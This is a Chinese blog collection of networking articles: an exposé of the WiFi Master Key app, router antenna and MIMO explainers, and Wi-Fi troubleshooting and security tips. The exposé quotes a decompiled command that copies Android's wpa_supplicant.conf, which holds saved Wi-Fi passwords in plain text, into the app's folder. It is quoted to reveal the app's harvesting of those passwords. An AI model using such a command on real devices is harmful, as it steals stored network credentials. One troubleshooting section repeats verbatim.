大漠荒颜|一个青海油田子弟的奋斗史

一个青海油田子弟的奋斗史
WiFi万能钥匙工作原理你了解吗?
“Wi-Fi万能钥匙”类APP是个各大商店中下载量最大的应用之一,通过它能让手机/平板随时随地蹭到别人的网络,简单粗暴。不过,使用它的同时,你也面临着很多安全上的隐患。
点击在新窗口中浏览此图片
Wi-Fi万能钥匙的工作原理是怎样的?
这个“钥匙”为什么能够破解Wi-Fi?它真的是“破解”Wi-Fi吗?Wi-Fi万能钥匙是怎么收集数据的?
Wi-Fi万能钥匙APP的工作原理并非“密码库穷举法”,而是依靠用户将已连接Wi-Fi热点名称、对应的唯一MAC地址信息和密码上传分享到APP后台服务器的数据积累。
点击在新窗口中浏览此图片
点击在新窗口中浏览此图片
它的破解原理不是什么穷举法之类的东西,根本谈不上是破解,分明就是盗窃!有人提出Wi-Fi万能钥匙的分享功能默认是关闭的,那么请看配图。
点击在新窗口中浏览此图片
点击在新窗口中浏览此图片
显然不是。而且即使它说没有分享,作为一个根本看不到源码的普通用户有如何确定它到底有没有分享呢?

知乎用户CATT L对WiFi万能钥匙做了一个相对深度的剖析,其中涉及软件工作原理的部分直接解释了这样的软件为什么这么”牛“。
知道为什么Wi-Fi万能钥匙需要root权限吗?因为我们安卓系统的手机无线账号数据是储存在一个文件里的,那就是/data/misc/wifi/wpa_supplicant.conf,这个是系统文件,权限不够高是无法访问的,而这个文件极其重要,得到了这个文件,或者能看到这个文件的内容,就意味着能得到这台手机登录过的所有Wi-Fi热点,以及它们的明文密码!Wi-Fi万能钥匙就是需要这个文件里的内容。
点击在新窗口中浏览此图片
点击在新窗口中浏览此图片
这位知乎用户将Wi-Fi万能钥匙反编译后放出源码,在源码的第1051行是这么写的:
点击在新窗口中浏览此图片
使用过Wi-Fi万能钥匙的用户都知道,当你的手机root了之后,Wi-Fi万能钥匙会主动向用户索要root权限。知乎上的一位用户对Wi-Fi万能钥匙1.0版本进行了反编汇,发现在软件代码里有一行写着const-string v3, "cat /data/misc/wifi/wpa_supplicant.conf>/data/data/com.snda.wifilocating/wifi.conf\n",软件访问了wpa_supplicant.conf文件,而且将其复制到了自己的缓存目录下。
有一个重要的点忘说了,这个是1.0版本,当时还没有热点备份功能的,然而源码上却做了这种小动作。
Apr
11
2017
随着IEEE 802.11ac标准的普及,无线路由器的天线数量也在逐渐攀升,也引起让不少用户陷入了一个思维误区:路由器的天线数量越多,速度、覆盖范围和穿墙能力也就越强。于是,很多路由器都以多天线作为卖点,而用户也非多天线的路由器不买。但是,你真的了解天线数量与路由器的关系吗?
点击在新窗口中浏览此图片
越来越多的天线
在802.11a/b/g时代,无线路由器最多只有1根天线(或内置天线设计),由于当时智能手机和平板尚未普及,而无线路由器也是一个相对小众的市场,因此没有太多用户会去关注天线的数量。随着移动设备(手机、平板、笔记本)和802.11n协议的普及,绝大多数的家庭都将无线路由器列入了“必买”名单,市场竞争的加剧促使厂家不得不为旗下产品寻找更能吸引用户的卖点。于是,哪怕是入门级的300Mbps无线路由也用上了4根天线(图1),路由器也由此进入了以天线数量论英雄的时代。
点击在新窗口中浏览此图片

天线是速率的判断依据
抛开高深的技术原理不谈,天线数量可以作为判断无线路由器传输速率的参考依据。比如,同样是1根天线,对802.11a/b/g的老款无线路由器就意味着最高支持54Mbps的传输速率;对802.11n意味最高支持150Mbps;对802.11ac意味最高支持433Mbps。于是,当我们看到某款无线路由器主打“最高多少速率”的参数,就能很快判断出它“应该”配备了几根天线(见表)。
点击在新窗口中浏览此图片
捕获

比如,那些号称300Mbps速率的802.11n无线路由器,必然要选择2路11n的天线设计(图2),也就是需要2根天线(每1路11n天线可提供150Mbps速率,2路刚好300Mbps);号称900Mbps的产品就需要3路11n+1路11ac的天线组合(图3),即3+1根天线(150Mbps×3+433 Mbps×1)。如果某款无线路由器速率和天线数量不符合这个规律,那就基本可以断定它采用了隐藏的内置天线设计,或是所谓的“假天线”(好一点的是用于数据备份,“坑爹”的则是直接空接)。
点击在新窗口中浏览此图片
点击在新窗口中浏览此图片
小提示

很多高端路由器采用了特殊的Dual-Band 2.4GHz/5GHz天线,在一根天线里可以发射/接受两个频段的信号,从而让11n和11ac双路天线实现了“二合一”。比如主打1750 Mbps速率的华硕RT-AC66U,该路由器就通过3根Dual-Band天线实现了3路11n+3路11ac的速率(图4)。因此,如果你发现某款高端路由器天线少于标称速率应有的速率,则可关注一下其中有无Dual-Band天线。
点击在新窗口中浏览此图片
由此可见,那些为300Mbps路由配4天线的产品,多出来的2根天线起不到任何“提速”的效果,只是厂家为了增添卖点而增加的“鸡肋”设计。可能有读者会问了,就算更多天线不能提高传输速率,那多少也能增加Wi-Fi信号强度、覆盖范围和穿墙能力吧?

多天线没有那么神奇

首先,无线路由器的理论覆盖范围是根据802.11协议而定,而信号强度和穿墙能力则要受到Wi-Fi信号的发射功率影响(为了降低辐射,工信部规定无线路由器的发射功率不得高于100mW),和天线数量没有半点关系。

理论上,更多的天线有利于减少信号覆盖区域内的盲点,但根据无数用户和媒体的实际测试反馈来看,这些差异在家庭环境中完全可以忽略不计。此外,还有很多用户认为外置天线的信号要优于隐藏的内置天线,这实际也是一大误区,很多千元级高端路由仍然热衷内置天线设计的现象就很能说明问题(图5 图注:采用内置天线设计的Netgear R6250)。
点击在新窗口中浏览此图片
总之,无线路由器的天线只是用于提升传输速率的硬件手段,而且数量和最高速率也有唯一的对应关系(比如1300Mbps就注定是3路11n+2路11ac)。数量少了,意味着最高速率可能存在缩水,数量多了也纯属浪费资源,而且有作为宣传噱头的嫌疑。

问题来了,为什么天线越多速率越快?所谓的x路11n+x路11ac又代表什么,为何路由器厂商要搞出两种不同标准天线的组合呢?

天线数量是这样影响速率的

在802.11n时代,无线通信领域引入了全新“MIMO”(Multiple-Input Multiple-Output,多入多出)技术(图6)。对无线路由器而言,天线就是实现MIMO技术的介质。简单来说,MIMO的核心理念就是在发送端(路由器)和接收端(手机、平板、笔记本等)同时安装多根天线,从而实现在同一时间发送/接收更多的信息,成倍提高传输信道的容量。在802.11n协议下,MIMO下每链路最大150Mbps,在802.11ac协议中每链路则为433Mbps,而这也就是上文我们用最高速率判断天线数量的依据。
点击在新窗口中浏览此图片
扩展阅读:不要盲目选购高速率路由器

我们可以将MIMO技术理解为高速公路的运营,天线数量就是收费站的窗口数量,发送端是入口方向,接收端是出口方向。150Mbps意味着只有1个收费窗口,车辆(信号数据)只能排队依次通过(图7);300Mbps意味着2个收费窗口,从而让车辆出入收费站的效率翻倍提升(图8)……如此看来,无线路由器的速率越高越值得选购?
点击在新窗口中浏览此图片
点击在新窗口中浏览此图片
答案是否定的。虽然很多新款手机、平板和笔记本的配备了支持802.11ac的无线网卡,但它们内部却仅配有1根天线(不支持MIMO技术),即最多支持433Mbps的传输速率。而更多的老款型号还停留在1根天线的802.11n时代,传输速率更是低至150Mbps,更高速路由器根本没有发挥的空间。这就好比高速入口是2车道,收费站窗口也是2个,但高速出口方向却只有1个车道,实际结果还是得排队(图9)。
点击在新窗口中浏览此图片
此外,目前国内家庭接入的光线宽带普遍为10MB~100MB,哪怕是802.11n标准的150Mbps路由也足以胜任。而更高速率路由器的最大意义就是提供更流畅的局域网环境,比如你用手机无线访问笔记本里的超高清视频、进行远程桌面等操作时,高速路由器才有发挥的空间。因此,普通家庭用户购买750 Mbps(2路11n+1路11ac)或900 Mbps的802.11ac无线路由器就足够用了。

802.11n和更早的无线协议都工作在2.4GHz的频段上,所以我们可以将匹配11n的天线理解为“2.4GHz天线”。2.4GHz虽然理论速度偏低,但却依靠较长的波长获得了极为出色的穿墙能力。可惜,我们熟悉的无线键鼠、无线音箱、无线耳机等外设也在占用2.4GHz频段的通道,与其工作在同一环境下的无线路由器将面临严重的信号干扰隐患。

为了提升传输速率并降低干扰,工作在5GHz频段上的802.11ac协议正式登场。遗憾的是,5GHz波长则相对较短,穿墙能力让人汗颜。既然2.4GHz速度慢易被干扰,而5GHz穿墙能力薄弱,如果将它们的优势合二为一自然就是最佳选择(图10)。
点击在新窗口中浏览此图片
于是,同时配备2.4GHz天线和5GHz天线的“双频”无线路由器就成为了市场的主流(图11),
点击在新窗口中浏览此图片
而前文提到的“x路11n+x路11ac”就是双频路由器的典型特性。

想购买的朋友可以看看TP-link天猫旗舰店详细参数及售价

小结
看到这里,相信大家已经对无线路由器的天线有了较为直观的认识。作为MIMO的介质,天线只是用来在单位时间内提高传输速率的硬件辅助,传说中天线越多可增强信号、覆盖范围、穿墙能力的结论是站不住脚的。总之,只要路由器的天线数量与其标称的最大传输速率相匹配即可,更多的天线就属于作用宣传的噱头了。
点击在新窗口中浏览此图片
Apr
10
2017
近几年随着宽带的普及,带宽的不断提速,家庭光纤宽带+无限网络的模式已成为标配,但随之而来的蹭网现象也给我们的网络使用和安全带来了不少困扰。如何判断家里的网络是否被“蹭”,请看下图:
点击在新窗口中浏览此图片
Wireless N.T | Tags: , , | 0 , 298 Ķ
Apr
9
2017
首先我们进入路由器界面先查看WAN口连接状态,先确定你是哪种情况,再对症下药。

路由器WAN口状态分为三种:

1. WAN口状态显示“未连接”

2. WAN口状态显示“联网中”

3. WAN口状态“已连接”但上不了网

若WAN口状态显示“未连接”

① 请检查宽带网线是否已经正确连接到路由器的WAN口,并且接触良好正常情况下WAN灯是常亮或闪烁的。(注意是WAN口哦!TAT小编第一次安装的时候就是不知道抽了什么风,网线接到了LAN口上了)

②网线质量太差或者损坏了。

更换一根新的网线(确保是好的)试试。

③ 入户网线太长导致驱动能力不足导致的。

可尝试修改WAN口速率为10M全双工。

若WAN口状态显示“联网中”

① 检查一下宽带帐号和密码有没有填写正确,注意区分帐号密码大小写哦~

② 网络宽带运营商可能把宽带帐号和电脑MAC地址绑定了。

可以尝试克隆一下你电脑的MAC地址到路由器的WAN口上。

(以F3界面为例,操作如下:勾选“使用”——选择“本机”——点击“确定”)

③ 当上网方式为自动获取(DHCP)时,由于路由器WAN口获取到的IP和路由器的LAN口IP冲突也会导致“联网中”。

可以尝试修改路由器LAN口IP。

例如:路由器LAN口IP原本为192.168.0.1,你可以尝试把它修改为192.168.10.1。

(PS:192.168.X.1, X=1-254)

④ 入户的宽带线过长导致驱动能力不足。

可尝试修改路由器WAN口速率为10M全双工。

⑤ 若尝试了①②③④的方法情况还是没有改变的话, 这个时候你就需要把接在路由器WAN口的宽带网线直接拔下来直接接到您的电脑上(也就是现在不接路由器了,直接用运营商的modem连接电脑上网),看能否正常上网,若不能正常上网请联系网络运营商。

若WAN 口显示“已联网”但无法上网

① 设置路由器时,上网方式选择错误。

进到路由器设置页面,重新选择正确的上网方式。

② 电脑IP地址没有改成自动获取,导致电脑无法正常获取路由器分配的IP地址。

把电脑的ip地址改成自动获取。

③ 电脑的域名服务器错误(DNS),具体表现为能上QQ,打不开网页。

手动指定本地连接DNS服务器为8.8.8.8 。
Apr
8
2017
大部分的无线网络,设备连接上网的网络结构如下图所示:
点击在新窗口中浏览此图片
在通信过程中,任一环节的故障、缺陷或攻击,都将导致设备掉线。
点击在新窗口中浏览此图片
以下为网络掉线时会出现的几种情况及对应的解决方法:

1 有线无线全部掉线

调整路由器WAN口速率模式,使WAN口与宽带线路有更稳定的适配效果。设置方法

检查WAN口网线,避免网线接口松动或接触不良。

升级路由器软件,使路由器运行更加稳定。

单机连接宽带上网(不通过路由器),确认宽带线路是否稳定。

2 个别无线掉线

远离微波炉、无线键盘鼠标等强干扰源,修改无线信道,降低无线受干扰程度。

修改无线名称和密码,提高网络安全性,避免被蹭网引发的不稳定。

升级路由器软件,使路由器运行更加稳定。

更新无线网卡驱动或操作系统,使终端有更好的兼容性。

3 全部无线掉线

修改无线名称和密码,提高网络安全性,避免被蹭网引发的不稳定。

关闭路由器的WPS功能,避免兼容性导致的不稳定。

升级路由器软件,使路由器运行更加稳定。

4 只有有线掉线

将电脑连接到路由器其他LAN口,避免个别接口接触不良。

修改无线名称和密码,提高网络安全性,避免被蹭网引发的不稳定。

升级路由器软件,使路由器运行更加稳定。
Apr
7
2017
无线网络的使用已经是越来越普及化了,然而我们在进行网络设置的同时很多时候会遇到一些棘手的问题,这里就为我们详细的说明一下。

伴随着低档次无线网络设备的价格不断走低,以及操作上的越来越简便,低档次无线局域网网络在最近几年得到了快速普及。为了方便进行资源共享、无线打印、移动办公操作,我们只要耗费几百元钱购买一台普通的无线路由器和一块无线网卡设备,就可以快速地搭建好一个简易的无线局域网网络了。不过,低档次无线局域网网络的不断普及,也容易给单位的信息安全带来不小的威胁。在这种情形下,我们该如何才能化解低档次无线网络的安全威胁,享受组网的快捷、便利呢?

低档次网络的安全弊病

以无线方式连接到小区宽带网络,并通过宽带网络进行共享访问Internet的组网环境下,我们往往只要先通过普通双绞线将低档无线路由器的WAN端口与小区宽带网络的交换端口连接在一起,然后参照说明书对无线路由器的连接端口参数进行合适的设置,就能上网访问了。由于在默认状态下,低档无线路由器会自动启用DHCP服务功能,当我们将无线网卡设备正确地安装到普通计算机上后,不需要进行任何参数设置就能自动连接到无线局域网网络中了。然而在享受组网便利的同时,低档次无线路由器的信号覆盖范围最远可达到300米左右,要是不采取安全措施进行防范的话,那么处于300米范围之内安装了无线网卡设备的普通计算机都能自动加入本地无线局域网网络中,那样一来本地无线局域网就容易遭遇非法攻击。

从目前来看,组建方便的低档次无线局域网存在下面一些安全弊病:

1、安全机制不太健全

低档次无线局域网大部分都采用了安全防范性能一般的WEP协议,来对无线上网信号进行加密传输,而没有选用安全性能较高的WAP协议来保护无线信号的传输。普通上网用户即使采用了WEP加密协议、进行了WEP密钥设置,非法攻击者仍然能通过一些专业的攻击工具轻松破解加密信号,从而非常容易地截取客户上网地址、网络标识名称、无线频道信息、WEP密钥内容等信息,有了这些信息在手,非法攻击者就能方便地对本地无线局域网网络进行偷窃隐私或其他非法入侵操作了。

此外,低档次无线局域网几乎都不支持系统日志管理、入侵安全检测等功能,可以这么说低档次无线局域网目前的安全机制还不太健全。

2、无法进行物理隔离

低档次无线局域网从组建成功的那一刻,就直接暴露在外界,无线网络访问也无法进行任何有效的物理隔离,各种有意的、无意的非法攻击随时存在,那么无线局域网中的各种隐私信息也会随时被偷偷窃取、访问。

3、用户安全意识不够

低档次无线局域网往往只支持简单的地址绑定、地址过滤以及加密传输功能,这些基本安全功能在非法攻击者面前几乎没有多大防范作用。不过,一些不太熟悉无线网络知识的用户为了能够快速地实现移动办公、资源共享等目的,往往会毫不犹豫地选用组网成本低廉、管理维护操作简便的低档次无线局域网,至于无线局域网的安全性能究竟如何,相信这些初级上网用户几乎不会进行任何考虑。再加上这些不太熟悉无线网络知识的初级用户,对网络安全知识了解得更少了,这些用户在使用无线网络的过程中很少有意识去进行一些安全设置操作。

组网便利下的安全威胁

既然低档次无线局域网存在上述一些安全弊病,这些弊病要是突然发作起来或被非法攻击者利用的话,那么就可能给我们带来不小的安全威胁:

1、造成隐私信息外泄

有的时候,不少无线局域网上网用户为了方便工作,往往会在不经意间将单位的重要隐私信息或核心工作信息,甚至将一些属于绝密范畴的信息通过移动设备挂上无线局域网网络中,这样无形之中就容易发生重要隐私信息外泄的危险,严重的时候能够给单位或个人造成巨大的经济损失。

2、降低内网安全能力

单位无线局域网附近有时还会存在一些家用无线局域网或者其他单位的无线局域网,这些无线局域网常常会用于移动办公或共享访问Internet网络的,这些无线网络的使用者大多没有足够的安全防范意识,并且他们应用无线网络的要求不是很高,也用不着对无线上网进行一些安全设置操作。在这种情形下,单位中任何一台安装了无线网卡设备的笔记本电脑都又可能自动连接到其他单位的无线局域网中,如此一来就容易发生这个单位的无线局域网与其他单位的无线局域网直接互联的现象,甚至可能出现单位无线局域网直接与Internet网络互联的现象,这些现象明显会降低单位内网安全防范能力,容易给单位造成严重的安全后果。

3、危及信息系统安全

考虑到低档次无线局域网组网成本低廉,不需要进行复杂布线,管理维护也很方便,要是安全意识不到位,那么一些规模较小的单位很可能出于技术、成本等因素,来选用一些价格低廉、质量低劣的无线网络设备进行组网升级、信息点的延伸,由这些网络设备搭建而成的网络将会天然暴露在外界,无线网络访问无法做到有效的物理隔离,那样一来单位的信息系统安全将会随时受到危及。

化解无线网络安全威胁

虽然低档次无线局域网容易给我们带来各种意想不到的安全威胁,会给单位的信息系统造成不小的安全隐患,不过对于那些对安全性要求不是很高的小规模单位来说,仍然可以选用低档次的无线局域网,毕竟这种类型的组网成本非常低廉,更为重要的是通过制定有效的措施完全可以将低档次无线局域网的安全威胁降到最低限度,让规模不大的单位用户也能尽情地享受组网便利。

1、向检查要安全

为了随时了解单位无线网络的安全状态,我们应该定期对单位的内网、外网使用情况以及核心网络设备的工作状态进行详细检查,并做好详细的检查记录。与此同时,我们还应该加大力度对单位无线局域网附近区域的无线网络工作环境进行动态监测,一定的时候还需要对单位的网络系统安全进行评估以及审计;此外,对于涉及到处于单位核心隐私信息以及进行重要网络应用的工作场所,应该及时采取电磁屏蔽等手段,来阻止非法网络入侵或攻击。

2、向宣传要安全

由于低档次无线局域网很容易影响到单位内部网络的使用安全性,为此单位负责人必须准备好丰富齐全的网络安全资料,在单位上、下定期开展无线上网安全知识的宣传、培训,以便强化每一位无线上网用户的安全防范意识,同时有必要针对性地进行网络安全专项整治工作,保证单位所有员工都能在思想上高度重视无线网络安全工作。
Oct
1
2016
无线网络出现故障,总会让网络管理员烦恼。有一些常规的故障还是比较容易排查的,但是有些就没有那么容易了。下面介绍的是关于一些无线网络故障做的排查工作,看看具体是怎么操作的呢?

无线路由器进行无线上网,已经变得逐步普及起来。不过,在无线上网的过程中,我们常常会遭遇到各式各样的无线网络故障,这些网络故障严重影响了正常的上网效率。事实上,我们只要在平时加强排查,及时总结各种常见无线网络故障的排除经验,相信日后我们一定能成为一名管理无线网络的行家里手!

排查连接线路,解决只发不收的无线网络故障

查看无线网络连接状态信息时,我们有时会看到无线网络可以对外发送信息,但无法从外部接收信息,这种单向通信的方式显然会影响我们正常的无线访问操作。当不幸遭遇到无线网络单向通信的麻烦时,我们可以按照如下思路进行逐一排查:

首先要保证无线网络连接线路处于通畅状态。在查看线路是否处于连通状态时,我们可以先打开IE浏览器,并在弹出的浏览窗口地址栏中输入路由器默认使用的IP地址(该地址一般能够从路由器的操作说明书中查找到),之后正确输入路由器登录帐号,打开路由器的后台管理界面。接着在该管理界面中执行ping命令,来ping一下本地Internet服务商提供的DNS服务器地址,要是目标地址能够被ping通的话,那就表明路由器设备到Internet服务商之间的线路连接处于畅通状态,要是目标地址无法被ping通的话,那说明路由器内部的部分参数可能没有设置正确,这时我们就必须对路由器内部的配置参数进行一下逐一检查。

在确认路由器内部配置参数都正确的前提下,我们可以在局域网中找一台网络配置正确、上网正常的工作站,并在该工作站中执行ping命令,来来ping一下路由器使用的IP地址,要是该地址可以被正常ping通的话,那就意味着局域网内部的线路连接也处于畅通状态,要是ping不通路由器使用的IP地址时,那我们就有必要检查本地工作站使用的网络参数与路由器使用的网络参数是否相符合,也就是说它们的地址参数是否处于同一网段内。要是上面的各个地址都能被顺利ping通,但无线网络连接仍然处于只发不收的状态时,那我们不妨重点检查一下本地工作站的DNS参数以及网关参数设置是否正确,在确认这些参数正确后,我们还需要再次进入到路由器后台管理界面,从中找到NAT方面的参数设置选项,并检查该选项配置是否正确。在进行这项参数检查操作时,我们重点要检查一下其中的NAT地址转换表中是否有内部网络地址的转译条目,要是没有的话,那只发不收无线网络故障多半是由于NAT配置不当引起的,这时我们只要将内部网络地址的转译条目正确添加到NAT地址转换表中就可以了。

排查连接方式,解决间歇断网的无线网络故障

在本地局域网通过无线路由器接入到Internet网络中的情形下,要是局域网中的工作站经常出现一会儿能正常上网、一会儿又不能正常上网的故障现象时,我们首先需要确保工作站与无线路由器之间的上网参数一定要正确,在该基础下就应该重点检查无线路由器的连接方式是否设置得当。通常情况下,无线路由器设备一般能支持三种或更多种连接方式,不过默认状态下多数无线路由器设备会使用“按需连接,在有访问数据时自动进行连接”这种连接方式,换句话说就是每隔一定的时间无线路由器设备会自动检测此时是否有线路空载,要是成功连接后该设备并没有侦察到线路中有数据交互动作的话,它将会把处于连通状态的无线连接线路自动断开。为此,当我们在实际上网的过程中,经常遇到间歇断网无线网络故障现象时,我们可以尝试进入到无线路由器后台管理设置界面,找到连接方式设置选项,并查看该选项的参数是否已经被设置为了“自动连接,在开机和断线后进行自动连接”,要是不正确的话,必须及时将连接方式修改过来,最后在后台管理界面中执行保存操作,将前面的参数修改操作保存成功,最后重新启动一下无线路由器设备,相信这样多半能解决无线网络间歇断网故障。

当然,通过上面的设置仍然不能解决间歇断网故障现象时,我们需要检查一下本地无线局域网中是否存在网络病毒攻击,因为一旦ARP网络受到病毒非法攻击的话,也有可能出现间歇断网故障。此时我们不妨在本地工作站系统中,打开本地连接属性设置窗口,然后进入到网卡设备的属性设置界面,在该界面中尝试修改一下网卡使用的IP地址,看看在新的IP地址条件下,间歇断网故障是否还能出现,要是该无线网络故障继续出现的话,我们一定要借助专业的抗病毒攻击的工具软件来保护无线局域网了。

排查连接方式,解决间歇断网的无线网络故障

在本地局域网通过无线路由器接入到Internet网络中的情形下,要是局域网中的工作站经常出现一会儿能正常上网、一会儿又不能正常上网的故障现象时,我们首先需要确保工作站与无线路由器之间的上网参数一定要正确,在该基础下就应该重点检查无线路由器的连接方式是否设置得当。通常情况下,无线路由器设备一般能支持三种或更多种连接方式,不过默认状态下多数无线路由器设备会使用“按需连接,在有访问数据时自动进行连接”这种连接方式,换句话说就是每隔一定的时间无线路由器设备会自动检测此时是否有线路空载,要是成功连接后该设备并没有侦察到线路中有数据交互动作的话,它将会把处于连通状态的无线连接线路自动断开。为此,当我们在实际上网的过程中,经常遇到间歇断网无线网络故障现象时,我们可以尝试进入到无线路由器后台管理设置界面,找到连接方式设置选项,并查看该选项的参数是否已经被设置为了“自动连接,在开机和断线后进行自动连接”,要是不正确的话,必须及时将连接方式修改过来,最后在后台管理界面中执行保存操作,将前面的参数修改操作保存成功,最后重新启动一下无线路由器设备,相信这样多半能解决无线网络间歇断网故障。

当然,通过上面的设置仍然不能解决间歇断网故障现象时,我们需要检查一下本地无线局域网中是否存在网络病毒攻击,因为一旦ARP网络受到病毒非法攻击的话,也有可能出现间歇断网故障。此时我们不妨在本地工作站系统中,打开本地连接属性设置窗口,然后进入到网卡设备的属性设置界面,在该界面中尝试修改一下网卡使用的IP地址,看看在新的IP地址条件下,间歇断网故障是否还能出现,要是该无线网络故障继续出现的话,我们一定要借助专业的抗病毒攻击的工具软件来保护无线局域网了。
Sep
9
2016
无线局域网(小型)在过去,是用于收发电子邮件和浏览网页的,无线局域网通常是由射频专家用的手动工具来排除网络故障的。但是随着数据流量大小和差异性日益显著,再加之无线局域网已经成为了网络接入的主要手段之一,无线局域网故障修复手段也得到了快速的成长。

WLAN管理工具如何提高WLAN故障修复的能力

随着802.11被越来越多地应用于各种消费性电子产品当中,如笔记本电脑、小型上网本、智能手机、打印机、摄像机等,用户在不同地方接入至网络的性能会因为设备不同而有所不同。为了达到最佳效果,咨询台必须对历史性数据和实时数据都有高度的洞察力。

这也正是当今WLAN管理工具当道的一个重要原因。例如,Meraki's 云计算控制器可显示每一个连接的客户端的近乎于实时的状态数据。除此之外,它还可以提供一些基本的功能(如,已连接AP的识别,在AP上Ping客户端,以及监测输入或输出计数器等)。该控制器的用法对咨询台来说相当简单,并且只需要在web上查看相关内容对他们来说方便了许多。

然而,随着网络的复杂程度日趋显著,相应的故障排除难度也在增加。当前,客户端可自由快速地在若干个AP之间漫游;有一些办公场所很可能会用多种不同品牌不同型号的AP进行连接,优秀的第三方WLAN管理通常也是比较有保障的。比如 Aruba的AirWave Management Platform就能显示多个供应商的AP,并根据客户端的职位特征进行调整,如咨询台,网络运营中心,或工程师们。对于每个连接都会有实时的监测和映射,并会记录下来以便进行趋势分析。其目的就是快速辨别故障的来源,是用户错误、客户端配置、网络中断、信号较弱,还是信号堵塞问题。与于Aruba的AirWave类似的监测工具,能解决大多数的第一层网络问题,如果出现其他问题则就需要申报至更高级别的工程师(第二层或第三层)。

使用分布式传感平台进行能动的WLAN测试

当然,最重要的就是要在故障还没有影响到用户体验之前,就识别、侦测并排除掉。正是由于这个原因,企业通常会运行自动化网络诊断测试——定期地连接至关键服务器和应用程序以快速识别NOC故障。

然而,在WLAN中进行网络担保是比较困难的,因为WLAN中的用户移动频率都比较高。要知道AP可达并不等同于验证了这个来自不同地域,使用不同SSID或频段的无线客户端可连接至该AP。对于后者,可以考虑类似于Motorola AirDefense Network Assurance Suite 或 7signal Sapphire的工具。

这些工具都使用了远距离配置Wi-Fi传感器来创建分布式测试平台。例如,AirDefense套件就是无线入侵防御系统(WIPS) 的扩展,它可以定期连接至附近的AP,就像“真实”的客户端。一旦连接后,这些传感器的客户端就可以运行网络担保测试,提前对NOC作出告警,并提供诊断数据(例如,远程数据包捕获,或其他关键指标)。

使用基于AP的频谱分析仪对信号质量进行监测

在WLAN中,由用户错误,客户端配置或上行网络/应用程序崩溃造成的故障是不能“自动复原”的。然而,有时候由信号覆盖较弱,或RF干扰导致的故障,却可以通过AP和控制器完成自我恢复。

几乎所有的AP都具有匹配最佳通道的特性。对于有些控制器来说,管理员可以立即释放一些通道,或者设置多长时间进行再一次检测。无线资源管理的算法千变万化,但是通常需要考虑的就是这些每条通道上的AP以及它们的信号强度。在5GHz DFS通道中,其他的信号传送器(譬如雷达系统)也需要考虑在内的。

但是由非802.11干扰引起的问题还是比较难诊断或避免的。当遇到这类故障时,传统的做法是,使用手持式信号分析仪进行抽样,这种方法有着一定的局限性。分散的干扰可能在抽样时没有传输。在嘈杂的高密集度的地方,光谱图很难形象地说明具体情况。到抽样值说明清楚后,解决方案可以又要改变了。

为了克服这些局限性,几家供应商,包括Aruba、Cisco、Meraki以及Motorola,现今都开始提供基于AP的频谱分析仪。虽然这些分析仪的性能各异,但是此类的工具都使用了AP去监听非802.11干扰。甚至还有几款产品应用了数字签名来识别干扰(如摄像机、电话等)。例如,Cisco的Clean Air 就可以定期地设定Aironet 3500 AP至监测模式,来分析2.4和5GHz干扰,并可以根据实际情况重新分配通道,避免802.11和非802.11干扰。

无线局域网再被企业组件式时,经常会遇到一些网络故障,像无线信号不稳定、可以搜索到信号无法动态获取ip地址、经常出现瞬间断开又连上等这样的现象是经常发生的,那么,以上的无线局域网故障修复措施就是很好的解救办法。
Sep
9
2016
无线网络的故障排除方法分为四个步骤进行,让我们一步一步的进行,首先肯定是要从无线路由开始了。

第一步:检查硬件及线路连接

你是一位无线网络用户吗?你认为组建无线网络最核心的设备是什么呢?相信绝大多数用户的答案都是无线路由器。没错,随着无线网络的迅速崛起,无线路由已然成为其中的核心枢纽,所以一旦它出现了故障问题,整个无线网络就会陷入瘫痪。那么如果故障真的出现了,我们又该如何解决,让无线网络恢复正常呢?很简单,按照下面介绍的四个步骤去操作,一般的无线网络故障都能轻松解决。

第一步:检查硬件及线路连接

无线路由出现故障的首要原因就是线路连接问题,但很多用户却常常忽视这一点,也因此走了不少弯路。所以当无线网络出现故障后,我们应首先保证无线路由的电源连接正常,然后查看宽带接入端口是否连接正确。我们可以通过无线路由上的状态指示灯进行判断,其中指示灯连续闪烁为正常,不亮或长亮不闪烁均为故障。如果指示灯显示不正常,我们应更换一根网线重新连接。

如果显示正常,但无线网络故障依旧,那么我们就需要检查无线路由的摆放位置以及它和客户端之间是否有大型障碍物或大功率电器设备。此时我们需要缩小无线路由和客户端之间的距离,并确保无线路由远离了大功率电器设备,因为这些电器的电磁辐射会严重影响无线网络信号传输,造成无线故障。

此外,客户端的无线网卡的检查也必不可少。首先,点击“查看可用的无线连接”,然后刷新“网络列表”并设置网卡参数,最后在“属性”中查看有无数据发送和接收。如果是客户端无线网卡出现问题,我们可以更换为外置USB无线网卡,或是重新安装网卡驱动程序,故障一般都可以解决。

最后,当然不能忽视无线路由自身的硬件故障。如果发现无线路由的状态指示灯不亮,客户端连接到无线路由时毫无反应,那么请及时与经销商联系,对无线路由器进行保修或更换良品。(PS:用户在购买无线产品时,一定要保留好发票或收据)

第二步:查看网卡和路由器设置

由于设置错误造成无线网络故障的问题也很常见,而设置错误也分为两方面,即客户端无线网卡设置错误和无线路由器设置错误。

客户端无线网卡的设置很简单,点击“网上邻居”,查看“无线网络连接”,然后设置无线网卡的“IP地址”“子网掩码”及“网关”,只要保证无线网卡的IP地址与无线路由的IP地址在同一网段即可。当然,一般情况下建议大家选择“自动获取”。

无线路由的设置相对复杂些。我们首先需要在浏览器地址栏中输入无线路由的IP地址,然后在弹出的登录界面中输入用户名及密码,接下来即可进入无线路由的Web配着界面(某些品牌的无线路由附带配置光盘,可以直接通过光盘进入)。

在Web配置界面中,我们首先要保证宽带接入方式正确,例如你是一位ADSL用户,那么你需要选择“PPPoE”接入方式,然后输入平时连接ADSL的用户名和密码,最后保存退出。如果此时仍无法连入无线网络,那么还需要检查“安全设置”选项,看看无线路由是否开启了“IP地址过滤”或“ MAC地址过滤”。如果开启了,可以暂时关闭这两个功能,然后尝试能否连接成功。

第三步:无线加密 防止网络攻击

网络攻击同样是造成无线网络故障的主要原因,其中最常见的就是ARP攻击。ARP攻击会造成网络IP地址冲突,数据的丢失及溢出,甚者有可能导致整个网络瘫痪。

如果用户发现自己已经遭受ARP攻击(主要表现是无法接入网络),应急的办法是进入“带有网络的安全模式”,然后在无线网卡的属性中修改客户端的IP地址,接下来查看是否可以连入网络。然后安装专业的杀毒软件及网络防火墙,防止类似的网络攻击再次出现。

给无线网络加密同样是无线路由必须的设置。现在大多数无线路由器都支持WEP、WPA/WPA2加密方式,其中WEP加密方式已被破解,因此不建议大家选择(如果你的无线路由仅支持WEP加密,那么请选择128位加密)。而WPA/WPA2无线加密则安全的多,一般的非法入侵者很难破解。

